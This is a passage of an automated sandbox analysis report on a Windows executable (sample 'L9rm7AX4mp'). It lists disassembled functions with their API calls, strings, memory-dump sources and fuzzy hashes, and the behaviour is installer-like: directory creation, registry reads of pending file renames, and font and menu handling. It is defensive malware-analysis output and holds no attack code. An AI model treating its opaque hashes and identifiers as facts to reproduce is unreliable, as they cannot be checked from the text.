                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                      • String ID: Creating directory: %s
                                                                                                      • API String ID: 2451617938-483064649
                                                                                                      • Opcode ID: 1f02ae1e850569658feceaaf3c85ff1782ed1f35d471b3de261e4d8f3d8ed172
                                                                                                      • Instruction ID: bdf8a9d00633064e3922ce557b3b2562df44373322d6b4000fae74d311730630
                                                                                                      • Opcode Fuzzy Hash: 1f02ae1e850569658feceaaf3c85ff1782ed1f35d471b3de261e4d8f3d8ed172
                                                                                                      • Instruction Fuzzy Hash: AE513F74A00248ABDB04DFA5D582BDEB7F5AF09304F50817BE850B7382D7786E08CB69
                                                                                                      Function 00454DC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E6E
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F34), ref: 00454ED8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressByteCharMultiProcWide
                                                                                                      • String ID: SfcIsFileProtected$sfc.dll
                                                                                                      • API String ID: 2508298434-591603554
                                                                                                      • Opcode ID: 6a91046d7309a4de6cfc4beec76e0de6ac9bbff88298f3f0baf31012854e5b94
                                                                                                      • Instruction ID: 1a17c74f1ac94ad93f17d87dc1e08c5ddb540f3824a5df31749c88666692504e
                                                                                                      • Opcode Fuzzy Hash: 6a91046d7309a4de6cfc4beec76e0de6ac9bbff88298f3f0baf31012854e5b94
                                                                                                      • Instruction Fuzzy Hash: 6A41A630A042189BEB10DB69DC85B9D77B8AB4430DF5081B7E908A7293D7785F88CF59
                                                                                                      Function 0044B39C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • 73A0A570.USER32(00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B411
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0044B434
                                                                                                      • 73A0A480.USER32(00000000,?,0044B474,00000000,0044B46D,?,00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B467
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A480A570ObjectSelect
                                                                                                      • String ID: k H
                                                                                                      • API String ID: 1230475511-1447039187
                                                                                                      • Opcode ID: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                                                                      • Instruction ID: b5872ed9d16ca79c431bae9e7544c15e8f802733be01f045b529408bc148fe47
                                                                                                      • Opcode Fuzzy Hash: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                                                                      • Instruction Fuzzy Hash: 6D217470A04248AFEB15DFA5C851B9EBBB9EB49304F51807AF504E7282D77CD940CB69
                                                                                                      Function 0044B0D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B15C,?,k H,?,?), ref: 0044B12E
                                                                                                      • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B141
                                                                                                      • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B175
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DrawText$ByteCharMultiWide
                                                                                                      • String ID: k H
                                                                                                      • API String ID: 65125430-1447039187
                                                                                                      • Opcode ID: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
                                                                                                      • Instruction ID: 2dd5a1fcad8022b5ecdd36c3e8438632fadfe976456551c737a9f8dd3ea145e1
                                                                                                      • Opcode Fuzzy Hash: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
                                                                                                      • Instruction Fuzzy Hash: A3110BB6700604BFE700DB5A9C91D6F77ECD749750F10413BF504D72D0C6389E018668
                                                                                                      Function 0042ED48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
                                                                                                        • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                        • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                                        • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                      • API String ID: 395431579-1506664499
                                                                                                      • Opcode ID: 0d90ae9549cb3a794f747e0b3b89476a1a48bf8a1e7f9d56d35495b62d60795c
                                                                                                      • Instruction ID: a33720f3aac7210c00664dabe11b621525643aa7ae94b1405928deeb439ddd4e
                                                                                                      • Opcode Fuzzy Hash: 0d90ae9549cb3a794f747e0b3b89476a1a48bf8a1e7f9d56d35495b62d60795c
                                                                                                      • Instruction Fuzzy Hash: 1611A331B00318BBDB11EB62ED81B8E7BA8DB55704F90407BF400A6691DBB8AE05C65D
                                                                                                      Function 004559FC Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegCloseKey.ADVAPI32(?,00455A67,?,00000001,00000000), ref: 00455A5A
                                                                                                      Strings
                                                                                                      • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A08
                                                                                                      • PendingFileRenameOperations, xrefs: 00455A2C
                                                                                                      • PendingFileRenameOperations2, xrefs: 00455A3B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                      • API String ID: 47109696-2115312317
                                                                                                      • Opcode ID: a871c7690d9b103e0f7f2022bbb7230101daa82acd14c33f99511ba30d6e5aa6
                                                                                                      • Instruction ID: a84b10804161a04e9b7828e63518c67389a2277fb2d5ef6d9c2d81c30e1ce2e0
                                                                                                      • Opcode Fuzzy Hash: a871c7690d9b103e0f7f2022bbb7230101daa82acd14c33f99511ba30d6e5aa6
                                                                                                      • Instruction Fuzzy Hash: 49F09671714A04BFEB05D665DC72E3A739CD744B15FA1446BF800C6682DA7DBE04951C
                                                                                                      Function 0047F804 Relevance: 6.1, APIs: 4, Instructions: 147fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?,00000000), ref: 0047F8AA
                                                                                                      • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?), ref: 0047F8B7
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D), ref: 0047F9AC
                                                                                                      • FindClose.KERNEL32(000000FF,0047F9D7,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?), ref: 0047F9CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 2066263336-0
                                                                                                      • Opcode ID: dd47ce488d5ea13da555b7d1a4745cf9b199e366fd9c8806cfe2b69594f7a430
                                                                                                      • Instruction ID: d4c1b09f85a1e3ce5f066f5119f691750f955bf6e0a6470712ab8dbd39f482a6
                                                                                                      • Opcode Fuzzy Hash: dd47ce488d5ea13da555b7d1a4745cf9b199e366fd9c8806cfe2b69594f7a430
                                                                                                      • Instruction Fuzzy Hash: 80513E71A00648AFCB10EF65CC45ADEB7B8AB88315F1085BAA818E7351D7389F49CF59
                                                                                                      Function 00421284 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetMenu.USER32(00000000), ref: 00421371
                                                                                                      • SetMenu.USER32(00000000,00000000), ref: 0042138E
                                                                                                      • SetMenu.USER32(00000000,00000000), ref: 004213C3
                                                                                                      • SetMenu.USER32(00000000,00000000), ref: 004213DF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu
                                                                                                      • String ID:
                                                                                                      • API String ID: 3711407533-0
                                                                                                      • Opcode ID: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
                                                                                                      • Instruction ID: 7918b5ac66a49b7c70f092078a7f06842b1ce09055eaa5e04548cec6233339c2
                                                                                                      • Opcode Fuzzy Hash: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
                                                                                                      • Instruction Fuzzy Hash: 7D41A13070025447EB20EA79A9857AB26969F69318F4805BFFC44DF3A3CA7DDC45839D
                                                                                                      Function 00416B52 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                                                                      • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$CallMessageProcSendTextWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 601730667-0
                                                                                                      • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                                      • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                                                                      • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                                                      • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                                                                      Function 004230D8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                                      • EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                                      • 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A14620A480A570EnumFonts
                                                                                                      • String ID:
                                                                                                      • API String ID: 2780753366-0
                                                                                                      • Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                                      • Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
                                                                                                      • Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
                                                                                                      • Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
                                                                                                      Function 0045C5C8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                                                      • FlushFileBuffers.KERNEL32(?), ref: 0045C7FD
                                                                                                      Strings
                                                                                                      • EndOffset range exceeded, xrefs: 0045C731
                                                                                                      • NumRecs range exceeded, xrefs: 0045C6FA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$BuffersFlush
                                                                                                      • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                      • API String ID: 3593489403-659731555
                                                                                                      • Opcode ID: 794c48d8177613dd3f63bd91f05815d926f9d199b7ec90082a892dce85f7227f
                                                                                                      • Instruction ID: 42c6ccb15965a4bc01c0ab80d29458e35b3cecf9486565f2d0e9c4cbdba5a9bf
                                                                                                      • Opcode Fuzzy Hash: 794c48d8177613dd3f63bd91f05815d926f9d199b7ec90082a892dce85f7227f
                                                                                                      • Instruction Fuzzy Hash: A5617134A002988FDB24DF25C891AD9B7B5EF49305F0084DAED89AB352D774AEC9CF54
                                                                                                      Function 00498578 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498586), ref: 0040334B
                                                                                                        • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498586), ref: 00403356
                                                                                                        • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
                                                                                                        • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                                        • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                                        • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                                        • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
                                                                                                        • Part of subcall function 00409B88: 6F541CD0.COMCTL32(0049859A), ref: 00409B88
                                                                                                        • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                                                        • Part of subcall function 00419050: GetVersion.KERNEL32(004985AE), ref: 00419050
                                                                                                        • Part of subcall function 0044F754: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
                                                                                                        • Part of subcall function 0044F754: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
                                                                                                        • Part of subcall function 0044FBFC: GetVersionExA.KERNEL32(0049B790,004985C7), ref: 0044FC0B
                                                                                                        • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
                                                                                                        • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
                                                                                                        • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
                                                                                                        • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
                                                                                                        • Part of subcall function 00456EEC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
                                                                                                        • Part of subcall function 00464960: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
                                                                                                        • Part of subcall function 00464960: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
                                                                                                        • Part of subcall function 0046D098: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
                                                                                                        • Part of subcall function 00478B3C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                                                                        • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                                                                        • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
                                                                                                        • Part of subcall function 00495584: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049559D
                                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,0049863C), ref: 0049860E
                                                                                                        • Part of subcall function 00498338: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
                                                                                                        • Part of subcall function 00498338: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
                                                                                                        • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                                                        • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                      • ShowWindow.USER32(?,00000005,00000000,0049863C), ref: 0049866F
                                                                                                        • Part of subcall function 00482050: SetActiveWindow.USER32(?), ref: 004820FE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF541FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                      • String ID: Setup
                                                                                                      • API String ID: 291738113-3839654196
                                                                                                      • Opcode ID: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
                                                                                                      • Instruction ID: d131c851e578025af209eb9e9c2d0e6aaf1cfb04eb4cc82699b843ce611002a7
                                                                                                      • Opcode Fuzzy Hash: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
                                                                                                      • Instruction Fuzzy Hash: 5C31D4702046409ED601BBBBED5352E3B98EB8A718B61487FF804D6553CE3D6C148A3E
                                                                                                      Function 00453A10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A56
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A5F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID: .tmp
                                                                                                      • API String ID: 1375471231-2986845003
